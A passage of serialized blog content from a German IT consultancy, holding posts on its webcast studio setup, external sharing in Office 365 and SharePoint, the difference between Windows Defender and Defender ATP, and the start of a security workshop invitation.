Erfolg.","2018-02-13","/posts/2018-02-12-summary-future-workplace-trainings",{"title":478,"description":531},"posts/2018-02-12-summary-future-workplace-trainings",[534,544],"Training","k4thJfOm-E1IPOq7nCzwwPNrfQ906Jp7anzY4RHX0PA",{"id":547,"title":548,"author":160,"body":549,"cta":3,"description":705,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":706,"moment":711,"navigation":415,"path":712,"seo":713,"stem":714,"tags":715,"webcast":406,"__hash__":718},"content_de/posts/2018-02-23-webcasts-behind-the-scenes.md","Webcast Friday: Behind the Scenes",{"type":350,"value":550,"toc":701},[551,560,563,580,583,592,599,602,605,619,628,633,692],[353,552,553,554,559],{},"Seit April 2016 streamt Glück & Kanja regelmäßig seinen ",[374,555,558],{"href":556,"rel":557},"https://glueckkanja.com/unternehmen/webcasts/",[378],"Webcast Friday",". Nun wird es endlich Zeit, einen Blick hinter die Kulissen zu werfen!",[353,561,562],{},"Angefangen haben wir mit zwei Logitech Webcams, einem USB-Mischpult mit Headset-Mikrophonen und einem Notebook mit Skype for Business Meeting Broadcast. Schnell mussten wir jedoch feststellen, dass dieses Setup unseren Ansprüchen nicht genügte. Es fehlte an Möglichkeiten zur Bildüberblendung, zum flexiblen Hin- und Herschalten zwischen mehreren Desktops der Referenten und Kameras, ausserdem gab es kaum Möglichkeiten für ein eigenes Branding.",[353,564,565,566,571,572,575,576,579],{},"Kurz darauf folgte die Anschaffung einer professionellen Live Produktionssoftware: ",[374,567,570],{"href":568,"rel":569},"https://www.vmix.com/",[378],"vMix",". Mit diesem Programm waren wir nun in der Lage, alle Eingänge (Webcams und Audio) einzeln zu steuern und das fertige Bild, den Output, wieder zurück zu Skype zu spielen. Durch das Hinzufügen von HDMI Capture Geräten ist auch die Aufnahme der Referenten-Desktops in ",[433,573,574],{},"HD Qualität"," möglich. Die Software erlaubt das Einbinden von jeglichem anderen multimedialen Inhalt, wie Bilder, Videos, Overlays, Texte, Animationen, etc. Dank vMix haben wir jetzt auch die Möglichkeit, direkt über YouTube zu streamen. Dadurch ist ein deutlich einfacherer Pre- und Post-Produktionsprozess als über Skype for Business Meeting Broadcast realisierbar und war auch ausschlaggebenend, dass wir zu ",[433,577,578],{},"YouTube als alleinige Streaming-Plattform"," gewechselt sind.",[353,581,582],{},"Einige Webcasts später kam der Green Screen hinzu. Hiermit haben wir uns unabhängig vom Aufnahmeort gemacht, wir können die Referenten vor jeden erdenklichen Hintergrund platzieren, wie auch in unserem aktuellen Webcast-Setup vor die typische Betonwand. Damit sich die Referenten aber perfekt vor dem Hintergrund einfügen, ist eine aufwendige Ausleuchtung des Studios notwendig. Somit fügten sich noch der ein oder andere Scheinwerfer unserem Equipment hinzu.",[353,584,585,589],{},[356,586],{"alt":587,"src":588},"Greenscreen","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/webcast-behindthescenes-greenscreen.jpg",[433,590,591],{},"Einfaches Green Screen Setup mit Tuch",[353,593,594,595,598],{},"Um das immer umfangreicher werdende Equipment fachgerecht zu lagern und nicht immer wieder bei jedem Webcast alles neu aufbauen zu müssen, haben wir seit letztem Jahr ein eigenes ",[433,596,597],{},"Flightcase",", das unsere komplette Regietechnik enthält, und indem wir zusätzlich das komplette Studio für ausser Haus Veranstaltungen aufbewahren und transportieren können.",[353,600,601],{},"Mittlerweile erlauben uns neue Übertragungstechniken wie NDI, alle Streams über unsere Netzwerkinfrastruktur zu routen. Damit können deutlich längere Übertragungswege, als sie überblicherweise bei HDMI-Kabeln der Fall sind, überbrückt werden. Außerdem können die Referenten-Desktops nun direkt gecaptured werden, und es wird auch kein Monitorkabel mit CaptureCard mehr benötigt. Auch hohe Auflösungen jenseits FullHD sind mit der NDI Capture Software kein Problem mehr.",[353,603,604],{},"Der komplette Output der vMix Software kann neben YouTube und anderen Streamingplattformen auch flexibel an jeden PC oder Mac verteilt werden. Somit bieten sich neue Möglichkeiten für die Regieassistenz oder Live-Übetragungen in die Konferenzräume.",[353,606,607,608,611,612,615,616,456],{},"Mit jedem Webcast werden wir professioneller und ambitionierter. Das Resultat daraus ist das heutige ",[433,609,610],{},"Glück & Kanja Webcast Studio",". Es wird nicht nur für die ",[433,613,614],{},"eigenen Produktionen"," genutzt, sondern auch für ",[433,617,618],{},"Trainingsvideos unserer Kunden",[353,620,621,625],{},[356,622],{"alt":623,"src":624},"Webcast Studio","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/webcast-greenscreen-studio2.jpg",[433,626,627],{},"Seit Sommer 2017 eigenes Glück & Kanja Webcast Studio",[629,630,632],"h3",{"id":631},"die-aktuelle-studioausstattung","Die aktuelle Studioausstattung",[367,634,635,638,641,650,653,656,659,662,665,668,671,674,683,686,689],{},[370,636,637],{},"Klimatisierter Aufnahmeraum mit fest installiertem Greenscreen",[370,639,640],{},"Akustikmaßnahmen mit definierten Nachhallzeiten",[370,642,643,644,649],{},"1x ",[374,645,648],{"href":646,"rel":647},"https://ptzoptics.com/usb/",[378],"PTZ Optics PT20X-USB-GY-G2 Kamera"," (Optischen Zoom, Fernsteuerung der Bewegung, Netzwerkanschluss)",[370,651,652],{},"3x HD-Webcams",[370,654,655],{},"2x Flächenleuchten",[370,657,658],{},"2x Softboxen",[370,660,661],{},"4K TV als Studio Monitor",[370,663,664],{},"4x Funkmikrofone",[370,666,667],{},"Behringer Mischpult QX1204",[370,669,670],{},"HiEnd Computer mit 112GB RAM, Dual Intel Xeon CPU, Nvidia GTX 960 und viel Festplattenplatz für die Aufnahmen",[370,672,673],{},"2x kalibrierte 24\" Monitore für die Regie",[370,675,676,677,682],{},"3x ",[374,678,681],{"href":679,"rel":680},"https://www.blackmagicdesign.com/products",[378],"Blackmagic"," Decklink PCIe Karten mit SDI und HDMI Interfaces",[370,684,685],{},"1x Sony Camcorder inkl. Newtek Connect Spark (ermöglicht uns Wireless aus dem kompletten Büro zu streamen)",[370,687,688],{},"Mehrere Stative und Traversen",[370,690,691],{},"Mobiler Green Screen",[353,693,694,695,700],{},"Unsere Webcast Produktionen machen immer wieder viel Spaß - sowohl vor als auch hinter der Kamera. So konnten zum Beispiel die Kollegen ihre Präsentationstechniken verbessern und sich in der Vorbereitung auf den Webcast mit einem Thema intensiver befassen. Nicht zu vergessen die großartigen Inhalte, die auf unserem ",[374,696,699],{"href":697,"rel":698},"https://www.youtube.com/user/glueckkanja",[378],"Glück & Kanja YouTube Channel"," stets angesehen werden können.",{"title":402,"searchDepth":403,"depth":403,"links":702},[703],{"id":631,"depth":704,"text":632},3,"Seit April 2016 streamt Glück & Kanja regelmäßig seinen Webcast Friday. Nun wird es endlich Zeit, einen Blick hinter die Kulissen zu werfen!",{"categories":707,"blogtitlepic":708,"thumb":709,"socialimg":710,"customExcerpt":705},[410],"head-webcast-behind-the-scenes","thumb-webcast-behind-the-scenes","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-webcast-behind-the-scenes.jpg","2018-02-23","/posts/2018-02-23-webcasts-behind-the-scenes",{"title":548,"description":705},"posts/2018-02-23-webcasts-behind-the-scenes",[716,717],"Webcast","Technik","_5V1tvXdCXWhPnUw1OUdnihWijbmyAlcCbl0LFSI7Jc",{"id":720,"title":721,"author":97,"body":722,"cta":3,"description":726,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":953,"moment":959,"navigation":415,"path":960,"seo":961,"stem":962,"tags":963,"webcast":406,"__hash__":970},"content_de/posts/2018-03-06-external-sharing-101.md","External Sharing 101 - Zusammenarbeit mit unternehmensfremden Accounts",{"type":350,"value":723,"toc":947},[724,727,741,751,755,782,788,797,803,825,829,842,848,868,904,907,911,926,930,937,939],[353,725,726],{},"Für das Teilen mit Externen unterscheiden wir zwei Optionen:",[367,728,729,735],{},[370,730,731,734],{},[433,732,733],{},"Teilen von einzelnen Ordnern oder Dateien (Single-Artifact)"," - basiert auf SharePoint Online und OneDrive for Business",[370,736,737,740],{},[433,738,739],{},"Teilen auf Basis einer Gruppenzugehörigkeit (Guest-Membership)"," - basiert auf einer Office 365 Group und setzt die Mitgliedschaft in einer Azure AD Gruppe voraus",[353,742,743,747],{},[356,744],{"alt":745,"src":746},"Links: Teilen einer Datei auf SharePoint, Rechts: Einladen eines Gates in eine Office 365 Group","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/external-sharing-101-sharepoint-file-vs-group.jpg",[748,749,750],"em",{},"Links: Teilen einer Datei auf SharePoint, Rechts: Einladen eines Gastes in eine Office 365 Group",[629,752,754],{"id":753},"datei-und-ordnerfreigabe-aka-single-artifact-sharing","Datei- und Ordnerfreigabe aka Single-Artifact Sharing",[353,756,757,758,761,762,767,768,771,772,775,776,781],{},"Der Dialog zum Teilen von Dateien und Ordnern hat sich über die Jahre immer wieder verändert. Seit gut einem Jahr hat Microsoft nun den „Goldenen Weg“ für die Freigabe-Funktion von einzelnen Elementen gefunden. Für das ",[433,759,760],{},"Single-Artifact Sharing"," kann der Administrator in SharePoint oder OneDrive Admin Center ",[374,763,766],{"href":764,"rel":765},"https://support.office.com/en-us/article/turn-external-sharing-on-or-off-for-sharepoint-online-6288296a-b6b7-4ea4-b4ed-c297bf833e30",[378],"Einschränkungen"," konfigurieren. In einem Tenant kann so das ",[433,769,770],{},"External Sharing"," komplett abgeschaltet werden oder stufenweise bis zum ",[433,773,774],{},"Anonymous Sharing"," alles erlaubt werden. Für jede Site Collection können abweichende, restriktivere ",[374,777,780],{"href":778,"rel":779},"https://support.office.com/en-us/article/turn-external-sharing-on-or-off-for-sharepoint-online-6288296a-b6b7-4ea4-b4ed-c297bf833e30#ID0EAABAAA=Site_collection",[378],"Einstellungen"," getroffen werden. Für alle Freigaben über Anonymous Sharing hinaus benötigt die zugreifende Person ein Login. In der Vergangenheit hat Microsoft hier ein Office 365 Konto (Azure AD) oder ein Microsoft Account (Consumer wie Hotmail oder Xbox) vorausgesetzt. Folgender Dialog hat über Jahre die Benutzer verwirrt und Administratoren graue Haare beschert:",[353,783,784],{},[356,785],{"alt":786,"src":787},"Login mit Organizational Account oder Microsoft Account","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/external-sharing-101-sharepoint-work-and-school.jpg",[353,789,790,791,796],{},"Anfang Oktober 2017 hat Microsoft im OneDrive Blog die Ankündigung für das ",[374,792,795],{"href":793,"rel":794},"https://techcommunity.microsoft.com/t5/OneDrive-Blog/Introducing-a-new-secure-external-sharing-experience/bc-p/134136",[378],"Secure External Sharing"," Feature konkretisiert. Externe Benutzer benötigen jetzt kein \"echtes\" Konto für den Zugriff auf die geteilten Dateien mehr. Der Auswahldialog für \"Organizational Account\" und \"Microsoft Account\" gehört der Vergangenheit an. Beim Login wird die E-Mail abgefragt, und der Benutzer bekommt einen \"Verification Code\" (PIN) gesendet. Nach Eingabe des Codes kann er auf die Daten zugreifen.",[353,798,799],{},[356,800],{"alt":801,"src":802},"Login mit Email und PIN","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/external-sharing-101-sharepoint-login-with-pin.jpg",[353,804,805,806,809,810,812,813,816,817,820,821,824],{},"Für alle externen Benutzer ",[433,807,808],{},"ohne eigenen Azure AD Account"," ist der neue Weg einfacher und weniger Fehler anfällig. Das komplizierte Einrichten eines Microsoft Accounts für bspw. einen Gmail Benutzer entfällt und wird so übersichtlicher, da der Externe keine spezielle Identität für den Zugriff auf SharePoint Online erstellen und sich merken muss. Die Zusammenarbeit mit anderen Office 365 Kunden allerdings wird deutlich geschwächt. Das neue ",[433,811,795],{}," prüft nämlich Stand Q1 2018 nicht, ob der eingeladene Benutzer ein Azure AD Account besitzt. In unseren 100% Cloud Projekten ist die Zuverlässigkeit der Identität das Kernelement für moderne Sicherheit. Corporate Managed Devices, MFA, Conditional Access und weitere Security Features aus Office 365 und EMS schützen eine provisionierte Azure AD Identität. Das neue ",[433,814,815],{},"Secure Email Sharing"," Scenario verlässt sich aber nur auf die Zustellung einer PIN. Dokumente können so zum Beispiel auf beliebigen Clients geöffnet werden, da keine ",[433,818,819],{},"Conditional Access Policies"," greifen. Die Zugriffe der externen Logins werden aber über die Office 365 ",[433,822,823],{},"Audit log search"," protokolliert. Der Einsatz des neuen PIN-gesicherten Logins unterstützt aktuell auch nicht das Öffnen von Dokumenten in Office Client Anwendungen. Durch den Einsatz der Office Online Funktionen kann zumindest ein Großteil der Dokumente im Browser auch gemeinsam mit anderen Personen bearbeitet werden.",[629,826,828],{"id":827},"ganzheitliches-teilen-über-gruppenfreigabe-aka-guest-membership-sharing","Ganzheitliches Teilen über Gruppenfreigabe aka Guest-Membership Sharing",[353,830,831,832,835,836,841],{},"Ist die Zusammenarbeit mit einem externen Kontakt ganzheitlicher und intensiver, so bietet es sich an, auf ein gruppenbasiertes Sharing zu setzen. Mit dem Single-Artifact Sharing können einzelne Dateien aus einem sensiblen Datentopf gezielt geteilt werden. Das ",[433,833,834],{},"Guest-Membership Sharing"," geht hingegen davon aus, dass der Externe genau wie jedes andere Gruppenmitglied alles sehen und schreiben darf. In Office 365 ist das über eine ",[374,837,840],{"href":838,"rel":839},"https://support.office.com/en-us/article/Learn-about-Office-365-groups-b565caa1-5c40-40ef-9915-60fdb2d97fa2",[378],"Office 365 Group"," umgesetzt. Als Schaltzentrale für modernes Teamwork setzt Microsoft auch in der Zusammenarbeit mit unternehmensfremden Identitäten auf genau dieses Konstrukt.",[353,843,844],{},[356,845],{"alt":846,"src":847},"Gäste als Mitglieder in einer Gruppe","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/external-sharing-101-sharepoint-guest-as-a-member.jpg",[353,849,850,851,856,857,862,863,867],{},"Konzeptionell sollte man davon ausgehen, dass alle Inhalte der Gruppe auch für externe Logins zur Verfügung stehen. Die Implementierung Stand Q1 2018 ist allerdings nicht vollständig, so dass Externe eben nicht auf alle Daten zugreifen können. Es ist aber davon auszugehen, dass Microsoft wie im Fall ",[374,852,855],{"href":853,"rel":854},"https://blogs.office.com/en-us/2017/09/11/expand-your-collaboration-with-guest-access-in-microsoft-teams/",[378],"Microsoft Teams"," nachbessert. Für ",[374,858,861],{"href":859,"rel":860},"https://products.office.com/en-US/business/office-365-roadmap?filters=&freeformsearch=planner&featureid=14702",[378],"Microsoft Planner"," ist ebenfalls bereits ein Zugang für externe Nutzer in Entwicklung. Stand Q1 2018 funktioniert ",[374,864,866],{"href":838,"rel":865},[378],"Guest Membership"," wie folgt:",[367,869,870,876,882,888,894,899],{},[370,871,872,875],{},[433,873,874],{},"Exchange"," - Weiterleitung aller Emails vom Gruppenverteiler (Benutzer ohne eigene Mailbox können vergangene Konversationen nicht einsehen, da OWA das nicht unterstützt)",[370,877,878,881],{},[433,879,880],{},"SharePoint aka Files"," - vollwertiges Mitglied mit Lese- und Schreibrechten auf alle Dateien der Gruppe, allerdings können Externe kein Group-Owner werden",[370,883,884,887],{},[433,885,886],{},"OneNote"," - liegt in SharePoint, daher vollumfänglicher Zugriff",[370,889,890,893],{},[433,891,892],{},"Planner"," - kein Zugriff",[370,895,896,898],{},[433,897,855],{}," - voller Zugriff auf persistenten Chat",[370,900,901,893],{},[433,902,903],{},"Microsoft Stream",[353,905,906],{},"Es gibt noch weitere angeschlossene Dienste (PowerBI, etc.), und die Liste wird weiter wachsen, aber grundsätzlich ist davon auszugehen, dass alle Gruppeninhalte kurzfristig auch für Externe zugänglich sind. Der Unternehmensadministrator kann einschränkend tätig werden. Guest Group Membership kann für alle Office 365 Groups auf Tenant Ebene abgeschaltet werden, auch selektiv für bspw. Gruppen mit hoher Sicherheitsstufe. Für angeschlossene Dienste wie zum Beispiel Microsoft Teams gibt es ebenfalls grobe Stellschrauben. In Teams kann man auf Tenant Ebene die Gastfunktion deaktivieren. Allerdings braucht es einiges an Planung und Schulung, damit die Mitarbeiter des eigenen Unternehmens nicht den Überblick verlieren und Daten ohne zusätzlichen Schutz (vgl. Azure Information Protection) ungewollt preisgegeben werden.",[629,908,910],{"id":909},"was-ist-eigentlich-mit-azure-ad-b2b-collaboration","Was ist eigentlich mit Azure AD B2B Collaboration?",[353,912,913,914,919,920,922,923,925],{},"Guest-Membership Sharing in Office 365 Groups setzt technisch auf die Funktionen von ",[374,915,918],{"href":916,"rel":917},"https://docs.microsoft.com/en-us/azure/active-directory/active-directory-b2b-what-is-azure-ad-b2b",[378],"Azure AD B2B Collaboration"," auf. Für jeden Gast in einer Office 365 Group gibt es eine eindeutige Referenz im Unternehmens Azure AD des einladenden Tenants. Vor der Einführung des neuen ",[433,921,795],{}," (E-Mail + PIN) hat auch das ",[433,924,760],{}," in SharePoint selber eine eindeutige Referenz im Unternehmens Azure AD erzeugt, allerdings an den Azure B2B Funktionen vorbei. Die neue Methode des Single Artifact Sharing setzt nicht mehr auf Azure AD oder Microsoft Accounts auf und verzichtet so auf Azure AD Referenzobjekte.",[629,927,929],{"id":928},"fazit-better-together","Fazit - Better together!",[353,931,932,933,936],{},"Single-Artifact Sharing ergänzt Guest-Membership Sharing. Microsoft richtet seinen Kurs auf Office 365 Groups aus, und so muss man sich zwangsläufig mit Gästen in Gruppen beschäftigen. Ist Ihr Unternehmen und, noch wichtiger, sind Ihre Benutzer noch nicht bereit für diesen Ansatz, so kann man jederzeit auf Single-Artifact Sharing zurückgreifen und externe Benutzer mit wenigen Klicks unkomplizierte auf einzelne Dateien in einer Group oder auf dem eigenen OneDrive berechtigen. Durch den gezielten Einsatz von ",[433,934,935],{},"Azure B2B Funktionen"," können auch kurzfristig Unzulänglichkeiten, wie der fehlende Einsatz von Office Desktop Applikationen, für Gäste umgangen werden. Wir unterstützen unsere Kunden gezielt mit Workshops, um eine maßgeschneiderte Lösung für Unternehmen zu finden und immer aktuell zu bleiben.",[399,938],{},[353,940,941,946],{},[374,942,945],{"href":943,"rel":944},"https://www.glueckkanja.com/unternehmen/kontakt-und-standorte/",[378],"Kontaktieren"," Sie uns.",{"title":402,"searchDepth":403,"depth":403,"links":948},[949,950,951,952],{"id":753,"depth":704,"text":754},{"id":827,"depth":704,"text":828},{"id":909,"depth":704,"text":910},{"id":928,"depth":704,"text":929},{"categories":954,"blogtitlepic":955,"thumb":956,"socialimg":957,"customExcerpt":958},[534],"head-external-sharing-101","thumb-external-sharing-101","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-external-sharing-101.jpg","Für den Austausch von Dateien setzen wir mit unserem Future Workplace auf SharePoint Online und OneDrive for Business. Der Einsatz bietet sich aber auch in herkömmlichen Umgebungen an. Die Funktion zum Teilen mit externen Benutzern wurde mit dem Übergang von BPOS zu Office 365 in SharePoint Online eingeführt. Microsoft hat nun zum Jahreswechsel eine Änderung im Bereich External Sharing produktiv genommen. Seit Einführung im Jahr 2011 dürfte es die grundlegendste Änderung sein. Für uns ist es Anlass genug, um einen Blick auf die Optionen für die Zusammenarbeit in **Office 365** zu werfen.","2018-03-06","/posts/2018-03-06-external-sharing-101",{"title":721,"description":726},"posts/2018-03-06-external-sharing-101",[534,964,965,966,967,968,969],"Teams","Sharing","Office365","SharePoint","OneDrive","Azure AD","Rpo_YQiR7QUbKNzkhUqHNSYFYE6Yr57kwIT-Rm8ucVY",{"id":972,"title":973,"author":31,"body":974,"cta":3,"description":1114,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1115,"moment":1122,"navigation":415,"path":1123,"seo":1124,"stem":1125,"tags":1126,"webcast":406,"__hash__":1128},"content_de/posts/2018-03-22-windows-defender-atp.md","Windows Defender ≠ Windows Defender ATP",{"type":350,"value":975,"toc":1108},[976,987,998,1002,1028,1032,1043,1046,1052,1056,1080,1085,1089,1098,1105],[353,977,978,979,982,983,986],{},"Vor fast einem Jahr baute Microsoft mit dem ",[433,980,981],{},"Windows 10 Anniversary Update (Windows 1607)"," neue Sensoren für den Schutz vor Viren und Malware in das Betriebssystem ein. Mit dem ",[433,984,985],{},"Windows Creators Update (1703)"," ergänzte Microsoft weitere Funktionen zum Erkennen, Untersuchen und Eindämmen von In-Speicher-Attacken und Kernel-Exploits. Mithilfe dieser Funktionen lassen sich selbst Bedrohungen finden, die noch hinter den hohen Burgmauern des Perimeternetzwerkes „leben“. Schon längst ist das Unternehmensnetzwerk keine sichere Burg mehr, und Angriffe können leicht hinter die Verteidigungsanlagen gelangen, zumal die Rechner der Anwender heute sehr mobil sind und sich nur noch teilweise im vermeintlich sicheren Unternehmensnetzwerk aufhalten.",[353,988,989,990,993,994,997],{},"Die Wurzeln von Windows Defender ATP gehen viele Jahre zurück. Aus der optionalen Anti-Malware Consumer Variante für Windows XP wurde schließlich eine professionelle Unternehmenslösung für Windows 10. ",[433,991,992],{},"Windows Defender"," und ",[433,995,996],{},"Windows Defender ATP"," sind zwar vom Namen her sehr ähnlich, unterscheiden sich jedoch grundlegend:",[629,999,1001],{"id":1000},"die-wichtigsten-funktionen-von-windows-defender","Die wichtigsten Funktionen von Windows Defender",[367,1003,1004,1007,1010,1013,1016,1019,1022,1025],{},[370,1005,1006],{},"Windows Defender ist ein klassischer Virenscanner mit Echtzeitschutz und Heuristiken.",[370,1008,1009],{},"Der optionale, integrierte Microsoft Active Protection Service (MAPS) sammelt Meta-Daten von Dateien, die verdächtig erscheinen. Diese werden über den cloudbasierten MAPS-Dienst analysiert.",[370,1011,1012],{},"Es gibt bis zu 4-mal am Tag neue Virensignatur-Dateien, verteilt über die Cloud oder lokal.",[370,1014,1015],{},"Das Network Inspection System beobachtet den Netzwerkverkehr des Clients und schützt so vor Bedrohungen aus dem Netzwerk.",[370,1017,1018],{},"Eine Verhaltensanalyse bewertet Software und blockiert diese notfalls.",[370,1020,1021],{},"Um die Dauer einer Überprüfung zu minimieren, können Dateien, Ordner oder Prozesse vom Scan ausgeschlossen werden.",[370,1023,1024],{},"Der Windows-Defender kennt grundsätzlich die drei Scanfunktionen Schnellüberprüfung, vollständige Überprüfung und benutzerdefinierte Überprüfung.",[370,1026,1027],{},"Filter für potentiell unerwünschte Applikationen (PUA) helfen, beispielsweise Werbesoftware, die „Huckepack“ mit Freeware-Tools installiert wird, zu identifizieren und zu entfernen.",[629,1029,1031],{"id":1030},"die-vorteile-von-windows-defender-mit-windows-10","Die Vorteile von Windows Defender mit Windows 10",[367,1033,1034,1037,1040],{},[370,1035,1036],{},"Der Virenscanner ist in Windows 10 eingebaut, dadurch entstehen keine zusätzlichen Implementationsaufwände durch die Installation eigener Virenscanner, und es kommt auch nicht zu einem Verlangsamen des Rechners durch zusätzliche Treiber.",[370,1038,1039],{},"Es entstehen keine potentiellen Sicherheitslücken aufgrund zusätzlicher Antiviren-Software einer Drittherstellers.",[370,1041,1042],{},"Windows Defender ist in die Verwaltungskonsole von Windows 10 integriert.",[353,1044,1045],{},"Zusammen mit den weiteren Sicherheitsmechanismen von Windows Enterprise, wie dem Browserschutz Application Guard und Windows Defender SmartScreen, Windows Defender Application Control, Windows Defender Device Guard, Windows Defender Exploit Guard und Windows Defender Credential Guard, ergibt sich ein sinnvoller Schutz für das Betriebssystem. Zusätzlich kann noch Datenverschlüsselung, wie Bitlocker und Azure Rights Management Services, eingesetzt werden.",[353,1047,1048,1051],{},[433,1049,1050],{},"Übrigens:"," Windows Defender schützt auch Windows Server 2016!",[629,1053,1055],{"id":1054},"die-wichtigsten-funktionen-von-windows-defender-advanced-thread-protection","Die wichtigsten Funktionen von Windows Defender Advanced Thread Protection",[367,1057,1058,1067,1070,1073],{},[370,1059,1060,1061,1063,1064,456],{},"Der Schutz vor Malware und die Integrität des Betriebssystems ist wichtig und notwendig. Aber keine Antiviren-Lösung kann einen hundertprozentigen Schutz vor Angriffen garantieren. Cyber-Kriminalität hat sich inzwischen zu einem Geschäftsmodell entwickelt, und deshalb gibt es auch immer raffiniertere Angriffe. Genau hier setzt ",[433,1062,996],{}," an. Es hilft nach einem erfolgten Angriff und ist eine sogenannte ",[433,1065,1066],{},"Post-Breach Technologie",[370,1068,1069],{},"Windows Defender ATP läuft Seite an Seite mit Windows Defender Antivirus oder auch einer anderen 3rd Party Antiviren-Lösung auf dem PC des Anwenders. Es ermöglicht eine detaillierte Verhaltensanalyse auf dem Rechner, um auch nach einem erfolgten Angriff die Oberhand über das Netzwerk zu erhalten. Windows ATP kann mittels Heuristiken unentdeckt gebliebene Bedrohungen erkennen und Angriffe auch noch im Nachhinein eindämmen und somit Schaden begrenzen.",[370,1071,1072],{},"Windows Defender ATP ist in Windows 10 bereits eingebaut und wird durch eine Lizenz aktiviert. Es ist also weder ein zusätzlicher Agent auf dem Rechner notwendig noch ist eine On-Prem-Infrastruktur erforderlich.",[370,1074,1075,1076,1079],{},"Die Analyse und Auswertung der verwalteten Rechner erfolgt cloudbasiert in einem kundeneigenen Tenant im sogenannten ",[433,1077,1078],{},"Windows Defender Advanced Security-Center",". Hier gibt es eine aggregierte Sicht auf die aktuellsten Warnungen, ihre Schweregrade und wann sie aufgetreten sind. Es zeigt die am meisten gefährdeten Maschinen auf und ermöglicht auch die Analyse von Warnungen für jede einzelne Maschine. Eine andere Sicht listet ebenfalls gefährdete Benutzer auf und zeigt einen Einblick in die Aktivitäten des Anwenders, die Handlungen und Beziehungen zu seinem Rechner. Wenn Windows Defender Antivirus als AV-Lösung auf dem Rechner verwendet wird, stehen auch die Informationen zur Virenerkennung hier zur Verfügung.",[353,1081,1082],{},[356,1083],{"alt":1078,"src":1084},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/windows-defender-security-center.jpg",[629,1086,1088],{"id":1087},"fazit","Fazit",[353,1090,1091,1092,993,1095,456],{},"Windows Defender ATP kombiniert also zwei Informationsquellen: ",[433,1093,1094],{},"Microsoft Windows 10",[433,1096,1097],{},"Microsoft Cloud Dienste",[353,1099,1100,1101,1104],{},"Erkenntnisse aus Diensten wie Azure oder Office 365, Xbox, Outlook, Hotmail und Bing fließen genauso in den ",[433,1102,1103],{},"Microsoft Intelligent Security Graph"," ein, wie auch Informationen von Microsofts eigenen Sicherheitsanalysten und -forschern, sowie Daten von Partnern aus der Industrie. Alle diese Informationen fließen in eine personalisierte Ansicht und Bewertung der eigenen Windows Defender ATP Umgebung.",[353,1106,1107],{},"Mit Windows ATP haben Sie also Werkzeuge, um den Umfang eines Angriffs zu erkennen und das verdächtige Verhalten von Rechnern Ihrer Mitarbeiter zu bewerten. Es können dann Maßnahmen ergriffen werden, um Dateien zu blockieren oder betroffene Endpunkte in Quarantäne zu nehmen. Da Windows ATP ein cloudbasierter Dienst ist, schützen Sie Ihre Mitarbeiter nicht nur in Ihrem Netzwerk, sondern immer und überall, sogar im Homeoffice oder im Kaffeehaus.",{"title":402,"searchDepth":403,"depth":403,"links":1109},[1110,1111,1112,1113],{"id":1000,"depth":704,"text":1001},{"id":1030,"depth":704,"text":1031},{"id":1054,"depth":704,"text":1055},{"id":1087,"depth":704,"text":1088},"Vor fast einem Jahr baute Microsoft mit dem Windows 10 Anniversary Update (Windows 1607) neue Sensoren für den Schutz vor Viren und Malware in das Betriebssystem ein. Mit dem Windows Creators Update (1703) ergänzte Microsoft weitere Funktionen zum Erkennen, Untersuchen und Eindämmen von In-Speicher-Attacken und Kernel-Exploits. Mithilfe dieser Funktionen lassen sich selbst Bedrohungen finden, die noch hinter den hohen Burgmauern des Perimeternetzwerkes „leben“. Schon längst ist das Unternehmensnetzwerk keine sichere Burg mehr, und Angriffe können leicht hinter die Verteidigungsanlagen gelangen, zumal die Rechner der Anwender heute sehr mobil sind und sich nur noch teilweise im vermeintlich sicheren Unternehmensnetzwerk aufhalten.",{"categories":1116,"blogtitlepic":1118,"thumb":1119,"socialimg":1120,"customExcerpt":1121},[1117],"Security","head-windows-defender-atp","thumb-windows-defender-atp","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-windows-defender-atp.jpg","Die Wurzeln von Windows Defender ATP gehen viele Jahre zurück. Aus der optionalen Anti-Malware Consumer Variante für Windows XP wurde schließlich eine professionelle Unternehmenslösung für Windows 10. Windows Defender und Windows Defender ATP sind zwar vom Namen her sehr ähnlich, unterscheiden sich jedoch grundlegend.","2018-03-22","/posts/2018-03-22-windows-defender-atp",{"title":973,"description":1114},"posts/2018-03-22-windows-defender-atp",[1127,422],"Defender","H3HaI7itwj9nalQ3-pIfyJf6YS6zThszgt2JR-9r5yU",{"id":1130,"title":1131,"author":191,"body":1132,"cta":3,"description":1186,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1187,"moment":1193,"navigation":415,"path":1194,"seo":1195,"stem":1196,"tags":1197,"webcast":406,"__hash__":1198},"content_de/posts/2018-04-06-ms-threat-management-workshop.md","Microsoft Threat Management Workshop",{"type":350,"value":1133,"toc":1184},[1134,1153,1156,1174,1181],[353,1135,1136,1137,1140,1141,1144,1145,1148,1149,1152],{},"In Zusammenarbeit mit der Enterprise Cybersecurity Group von Microsoft und weiteren Partnern laden wir Sie deshalb zu einem exklusiven ",[433,1138,1139],{},"Threat Management Workshop"," in München ein. Sie erhalten von Security Experten Informationen zur ",[433,1142,1143],{},"Cybersecurity Strategie",", Einblicke wie Microsoft ",[433,1146,1147],{},"Cyberkriminalität bekämpft"," und wie Windows Defender ATP, Office 365 ATP und Azure ATP bei der ",[433,1150,1151],{},"Erkennung und Reaktion auf Cyber-Angriffe"," unterstützten kann.",[353,1154,1155],{},"Der Vormittag richtet sich mit strategischen Vorträgen an Ihre Geschäftsführung oder IT-Sicherheitsverantwortliche, während der praktische Hands-On Teil am Nachmittag 